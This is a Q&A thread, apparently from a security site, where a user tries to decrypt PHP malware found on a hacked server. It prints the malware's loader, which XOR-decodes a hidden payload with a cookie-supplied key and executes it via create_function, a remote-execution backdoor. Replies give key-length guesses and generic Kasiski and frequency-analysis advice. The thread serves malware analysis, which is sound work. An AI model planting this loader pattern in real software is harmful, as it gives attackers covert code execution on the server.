My friend's server was recently hacked and I'm trying to decipher the malicious files I found in hopes of understanding the hack better. I can tell that they're using an XOR/Vigenère cipher and I've tried to learn everything I could about that on my own, but while I am a programmer I'm not a cryptographer and most of what I've found has gone over my head. I'm wondering if someone here would be kind enough to walk me through what I would actually need to do to break the cipher.

Here's the code in question:


$vewusl = 'ZW5jMTMz...XBzazt9KCRzJXMn'; //Truncated from 1165 lines of encrypted data by me, the guy asking this question

$_igophqd = create_function ('$vewusl', igophqd (base64_decode (
), $_COOKIE [str_replace('.', '_', $_SERVER['HTTP_HOST'])]) . ';'); $_igophqd($vewusl); 

function igophqd ($udopz, $bgsqhbl) { return $udopz ^ str_repeat ($bgsqhbl, ceil (strlen ($udopz) / strlen ($bgsqhbl))); }  

I obviously don't have access to the data stored in the cookie. All the malicious files are the same, so I don't think we can use two of them to figure out the key.

Since the encrypted code creates a function, I assume it's executable PHP which likely has spaces, dollar signs, and other coding symbols. I tried using every tool I could find to help with this (xortool, XORRepeatingKeyCrypto, XORSearch & XORStrings, xorbruteforcer, iheartxor, NoMoreXOR) but mind you I'm not really trained to use any of those.

Based on my analysis I suspect the key contains x62 and is either 32, 36, or 28 characters long, but again, I'm not an expert at this stuff. The key may also contain: x16,x17,x0d,x0f,x33,x66,x36,6,T,12...

I understand the programming part just fine, but I thought it might be useful to have the context. Here's the just the cipher I'm trying to break, which I think is XOR encrypted with a repeating key:


And the base64 decoded version:


Or am I supposed to retain the spaces in the base64 decoded output? I'm guessing that I don't retain the spaces and that this is what I should be trying to break, but these are the kinds of things I'm not sure about.

I also created a gist with the full file contents in case we need what's in $vewusl in order to crack this cipher.

  • What's the value of $_SERVER['HTTP_HOST'] ?
    – Mick
    Commented Aug 28, 2017 at 20:50
  • I'll post a more detailed answer later, but as I noted on SO, the key length is definitely 128 bytes. I haven't managed to fully crack the cipher, but I did play around with it a bit, and it looks like the plaintext probably begins with eval (( (igophqd (base64_decode (' followed by 763 bytes of base64 data, ='), and about 60 bytes that I haven't managed to decode yet. Alas, that means that there's yet another base64-and-XOR layer, probably somehow keyed by the $vewusl string, involved. Commented Sep 15, 2017 at 2:43
  • @IlmariKaronen Absolutely amazing! I'm most curious to know how you figured all that out.
    – Beau
    Commented Sep 16, 2017 at 0:04

1 Answer 1


When it comes to break some encrypted texts, you have to take a few hypothesis and check it with caution (it may make you loose a lot of time... believe me).

The first Base64 decoding seems to be quite promising and lead to some hexadecimal blob that you should analyze first before trying to step further.

I would advise you to make a frequency analysis of the hexadecimal blob grouping the characters two by two (sounds pretty common as two characters in hexadecimal is a byte).

I wouldn't be surprised if:

  • All the hexadecimal code in the blob are within the printable zone in the ASCII table.
  • Once translated back into ASCII table, the message will have no meaning.

It should means that another encoding/encryption has been applied to the blob which can be either XOR-encryption or Vigenere encryption.

The good news is that both encryption (Vigenere and XOR) are quite easily breakable with the same approach.

  1. Perform a Kasiski examination of the encrypted text to find the size of the key (the length of the encoding word if it is a Vigenere and the length of the XORing vector if it is XOR-encryption).

  2. Perform a frequency analysis for each letter/byte of the Vigenere/XOR password.

  3. Add some intuition and guessing to reach the full text.

I hope this will help you a bit.

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